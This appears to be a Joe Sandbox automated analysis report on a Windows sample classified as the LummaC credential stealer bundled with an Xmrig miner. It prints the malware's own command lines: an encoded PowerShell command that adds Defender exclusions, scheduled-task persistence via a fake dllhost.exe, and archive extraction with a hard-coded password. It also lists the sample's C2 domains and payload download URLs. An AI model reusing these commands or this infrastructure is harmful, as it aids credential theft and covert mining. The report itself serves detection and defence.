Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PqSIlYOaIF.exe

Overview

General Information

Sample name:PqSIlYOaIF.exe
renamed because original name is a hash value
Original sample name:007310a11e7dfdb4fa9dd2e216f92cda9a1954c7be76a33aaf8028206a0c0258.exe
Analysis ID:1553050
MD5:40afdfd06da2cbfab2cfb3444b60174c
SHA1:baf21b9229c78bfeb1dfd2a898029bae1e1075bd
SHA256:007310a11e7dfdb4fa9dd2e216f92cda9a1954c7be76a33aaf8028206a0c0258
Tags:exenotion-ramchhaya-comuser-JAMESWT_MHT
Infos:

Detection

LummaC, Xmrig
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected LummaC Stealer
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Connects to a pastebin service (likely for C&C)
Contains functionality to detect sleep reduction / modifications
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Drops password protected ZIP file
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sample uses string decryption to hide its real strings
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
PE file overlay found
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Suspicious Execution of Powershell with Base64
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • PqSIlYOaIF.exe (PID: 7784 cmdline: "C:\Users\user\Desktop\PqSIlYOaIF.exe" MD5: 40AFDFD06DA2CBFAB2CFB3444B60174C)
    • conhost.exe (PID: 7792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • PqSIlYOaIF.exe (PID: 7908 cmdline: "C:\Users\user\Desktop\PqSIlYOaIF.exe" MD5: 40AFDFD06DA2CBFAB2CFB3444B60174C)
      • LOK6C9E3IK9GW8BSQQ492.exe (PID: 7432 cmdline: "C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exe" MD5: CE901A874C9D157E48F83B1BE3D32AA6)
        • cmd.exe (PID: 7600 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 7604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • mode.com (PID: 1460 cmdline: mode 65,10 MD5: BEA7464830980BF7C0490307DB4FC875)
          • 7z.exe (PID: 3480 cmdline: 7z.exe e file.zip -p29586644319935208542739921766 -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
          • 7z.exe (PID: 2220 cmdline: 7z.exe e extracted/file_11.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
          • 7z.exe (PID: 4872 cmdline: 7z.exe e extracted/file_10.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
          • 7z.exe (PID: 6556 cmdline: 7z.exe e extracted/file_9.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
          • 7z.exe (PID: 936 cmdline: 7z.exe e extracted/file_8.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
          • 7z.exe (PID: 2288 cmdline: 7z.exe e extracted/file_7.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
          • 7z.exe (PID: 1980 cmdline: 7z.exe e extracted/file_6.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
          • 7z.exe (PID: 6576 cmdline: 7z.exe e extracted/file_5.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
          • 7z.exe (PID: 3980 cmdline: 7z.exe e extracted/file_4.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
          • 7z.exe (PID: 1280 cmdline: 7z.exe e extracted/file_3.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
          • 7z.exe (PID: 3756 cmdline: 7z.exe e extracted/file_2.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
          • 7z.exe (PID: 7640 cmdline: 7z.exe e extracted/file_1.zip -oextracted MD5: 619F7135621B50FD1900FF24AADE1524)
          • attrib.exe (PID: 7772 cmdline: attrib +H "Installer.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)
          • Installer.exe (PID: 7868 cmdline: "Installer.exe" MD5: 89A069871324D35E25922F6FB881D514)
            • RegSvcs.exe (PID: 7988 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
              • cmd.exe (PID: 1080 cmdline: "cmd.exe" /C powershell -EncodedCommand "PAAjAG0AQQBwADMAZQB0AGgAMQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFoASwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB1AEcAbgBPAGoASgBpADIAQwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBtAEMAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • conhost.exe (PID: 1096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • powershell.exe (PID: 3656 cmdline: powershell -EncodedCommand "PAAjAG0AQQBwADMAZQB0AGgAMQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFoASwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB1AEcAbgBPAGoASgBpADIAQwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBtAEMAIwA+AA==" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
                  • WmiPrvSE.exe (PID: 3896 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
              • cmd.exe (PID: 7832 cmdline: "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • conhost.exe (PID: 2284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • schtasks.exe (PID: 3352 cmdline: SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" MD5: 48C2FE20575769DE916F48EF0676A965)
              • cmd.exe (PID: 2968 cmdline: "cmd.exe" /c SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk3195" /TR "C:\ProgramData\Dllhost\dllhost.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
                • conhost.exe (PID: 3360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • schtasks.exe (PID: 400 cmdline: SCHTASKS /CREATE /SC HOURLY /TN "NvStray\NvStrayService_bk3195" /TR "C:\ProgramData\Dllhost\dllhost.exe" MD5: 48C2FE20575769DE916F48EF0676A965)
    • WerFault.exe (PID: 8004 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7784 -s 136 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig

Malware Configuration

Threatname: LummaC

{"C2 url": ["pragapin.sbs", "repostebhu.sbs", "tamedgeesy.sbs", "rottieud.sbs", "ducksringjk.sbs", "relalingj.sbs", "brownieyuz.sbs", "thinkyyokej.sbs", "explainvees.sbs"], "Build id": "BVnUqo--@StayAway777"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    0000001C.00000002.1722768807.0000000003135000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      00000003.00000003.1458516280.0000000003014000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000003.00000003.1422795578.0000000003018000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          0000001A.00000002.1666398916.000000000063A000.00000004.00000001.01000000.00000009.sdmpINDICATOR_SUSPICIOUS_EXE_ASEP_REG_ReverseDetects file containing reversed ASEP Autorun registry keysditekSHen
          • 0x28d1:$s1: nuR\noisreVtnerruC\swodniW\tfosorciM
          00000003.00000002.1595198673.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
            Click to see the 13 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.2.PqSIlYOaIF.exe.400000.1.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
              3.2.PqSIlYOaIF.exe.400000.1.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                28.2.RegSvcs.exe.30eb53d.1.unpackJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: Files With System Process Name In Unsuspected Locations
                  Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ProcessId: 7988, TargetFilename: C:\ProgramData\Dllhost\dllhost.exe
                  Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "cmd.exe" /C powershell -EncodedCommand "PAAjAG0AQQBwADMAZQB0AGgAMQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFoASwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB1AEcAbgBPAGoASgBpADIAQwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBtAEMAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off, CommandLine: "cmd.exe" /C powershell -EncodedCommand "PAAjAG0AQQBwADMAZQB0AGgAMQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFoASwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB1AEcAbgBPAGoASgBpADIAQwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBtAEMAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentProcessId: 7988, ParentProcessName: RegSvcs.exe, ProcessCommandLine: "cmd.exe" /C powershell -EncodedCommand "PAAjAG0AQQBwADMAZQB0AGgAMQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFoASwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB1AEcAbgBPAGoASgBpADIAQwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBtAEMAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off, ProcessId: 1080, ProcessName: cmd.exe
                  Sigma detected: Suspicious Execution of Powershell with Base64
                  Source: Process startedAuthor: frack113: Data: Command: powershell -EncodedCommand "PAAjAG0AQQBwADMAZQB0AGgAMQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFoASwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB1AEcAbgBPAGoASgBpADIAQwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBtAEMAIwA+AA==" , CommandLine: powershell -EncodedCommand "PAAjAG0AQQBwADMAZQB0AGgAMQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFoASwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB1AEcAbgBPAGoASgBpADIAQwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBtAEMAIwA+AA==" , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "cmd.exe" /C powershell -EncodedCommand "PAAjAG0AQQBwADMAZQB0AGgAMQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFoASwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB1AEcAbgBPAGoASgBpADIAQwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBtAEMAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1080, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -EncodedCommand "PAAjAG0AQQBwADMAZQB0AGgAMQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFoASwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB1AEcAbgBPAGoASgBpADIAQwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBtAEMAIwA+AA==" , ProcessId: 3656, ProcessName: powershell.exe
                  Sigma detected: Non Interactive PowerShell Process Spawned
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -EncodedCommand "PAAjAG0AQQBwADMAZQB0AGgAMQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFoASwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB1AEcAbgBPAGoASgBpADIAQwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBtAEMAIwA+AA==" , CommandLine: powershell -EncodedCommand "PAAjAG0AQQBwADMAZQB0AGgAMQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFoASwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB1AEcAbgBPAGoASgBpADIAQwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBtAEMAIwA+AA==" , CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "cmd.exe" /C powershell -EncodedCommand "PAAjAG0AQQBwADMAZQB0AGgAMQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFoASwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB1AEcAbgBPAGoASgBpADIAQwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBtAEMAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1080, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -EncodedCommand "PAAjAG0AQQBwADMAZQB0AGgAMQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFoASwAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABAACgAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBEAHIAaQB2AGUAKQAgADwAIwB1AEcAbgBPAGoASgBpADIAQwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBtAEMAIwA+AA==" , ProcessId: 3656, ProcessName: powershell.exe

                  Persistence and Installation Behavior

                  barindex
                  Sigma detected: Schedule system process
                  Source: Process startedAuthor: Joe Security: Data: Command: "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe", CommandLine: "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, ParentProcessId: 7988, ParentProcessName: RegSvcs.exe, ProcessCommandLine: "cmd.exe" /c SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe", ProcessId: 7832, ProcessName: cmd.exe

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-10T09:18:22.738243+010020229301A Network Trojan was detected172.202.163.200443192.168.2.949827TCP
                  2024-11-10T09:19:00.782289+010020229301A Network Trojan was detected172.202.163.200443192.168.2.949990TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-10T09:18:08.793746+010020283713Unknown Traffic192.168.2.949744104.21.39.3443TCP
                  2024-11-10T09:18:10.027265+010020283713Unknown Traffic192.168.2.949751104.21.39.3443TCP
                  2024-11-10T09:18:11.483167+010020283713Unknown Traffic192.168.2.949761104.21.39.3443TCP
                  2024-11-10T09:18:12.997750+010020283713Unknown Traffic192.168.2.949769104.21.39.3443TCP
                  2024-11-10T09:18:14.620844+010020283713Unknown Traffic192.168.2.949781104.21.39.3443TCP
                  2024-11-10T09:18:17.132513+010020283713Unknown Traffic192.168.2.949798104.21.39.3443TCP
                  2024-11-10T09:18:18.907281+010020283713Unknown Traffic192.168.2.949808104.21.39.3443TCP
                  2024-11-10T09:18:21.877432+010020283713Unknown Traffic192.168.2.949824104.21.39.3443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-10T09:18:09.319640+010020546531A Network Trojan was detected192.168.2.949744104.21.39.3443TCP
                  2024-11-10T09:18:10.547975+010020546531A Network Trojan was detected192.168.2.949751104.21.39.3443TCP
                  2024-11-10T09:18:22.362223+010020546531A Network Trojan was detected192.168.2.949824104.21.39.3443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-10T09:18:09.319640+010020498361A Network Trojan was detected192.168.2.949744104.21.39.3443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-10T09:18:10.547975+010020498121A Network Trojan was detected192.168.2.949751104.21.39.3443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-10T09:18:13.810342+010020480941Malware Command and Control Activity Detected192.168.2.949769104.21.39.3443TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-10T09:18:41.070302+010028290562Crypto Currency Mining Activity Detected192.168.2.949933147.45.47.8180TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Antivirus detection for URL or domain
                  Source: http://147.45.47.81/conhost.exeAvira URL Cloud: Label: malware
                  Source: http://147.45.47.81/WatchDog.exeAvira URL Cloud: Label: malware
                  Source: http://147.45.47.81/WinRing0x64.sysAvira URL Cloud: Label: malware
                  Source: http://147.45.47.81/lolMiner.exeAvira URL Cloud: Label: malware
                  Source: http://147.45.47.81/xmrig.exeAvira URL Cloud: Label: malware
                  Source: http://147.45.47.81/conhost.exe.Avira URL Cloud: Label: malware
                  Antivirus detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\main\extracted\Installer.exeAvira: detection malicious, Label: TR/Dldr.Agent.vfpsy
                  Source: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeAvira: detection malicious, Label: TR/Redcap.bgduw
                  Found malware configuration
                  Source: 00000000.00000002.1473925946.00000000041A4000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: LummaC {"C2 url": ["pragapin.sbs", "repostebhu.sbs", "tamedgeesy.sbs", "rottieud.sbs", "ducksringjk.sbs", "relalingj.sbs", "brownieyuz.sbs", "thinkyyokej.sbs", "explainvees.sbs"], "Build id": "BVnUqo--@StayAway777"}
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\LOK6C9E3IK9GW8BSQQ492.exeReversingLabs: Detection: 79%
                  Source: C:\Users\user\AppData\Local\Temp\main\extracted\Installer.exeReversingLabs: Detection: 91%
                  Multi AV Scanner detection for submitted file
                  Source: PqSIlYOaIF.exeReversingLabs: Detection: 60%
                  Source: PqSIlYOaIF.exeVirustotal: Detection: 29%Perma Link
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Local\Temp\main\extracted\Installer.exeJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: PqSIlYOaIF.exeJoe Sandbox ML: detected
                  Sample uses string decryption to hide its real strings
                  Source: 00000003.00000002.1595198673.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: tamedgeesy.sbs
                  Source: 00000003.00000002.1595198673.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: relalingj.sbs
